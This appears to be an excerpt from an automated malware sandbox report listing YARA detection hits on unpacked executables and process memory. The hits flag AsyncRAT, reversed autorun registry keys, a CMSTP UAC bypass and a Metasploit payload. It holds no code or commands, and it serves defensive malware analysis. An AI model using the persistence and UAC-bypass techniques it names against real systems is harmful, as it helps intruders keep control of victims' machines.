                                Source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 50.2.c7f37422c5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 16.2.935372fb1f.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000023.00000002.22887398976.000000000A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                                Source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                                Source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
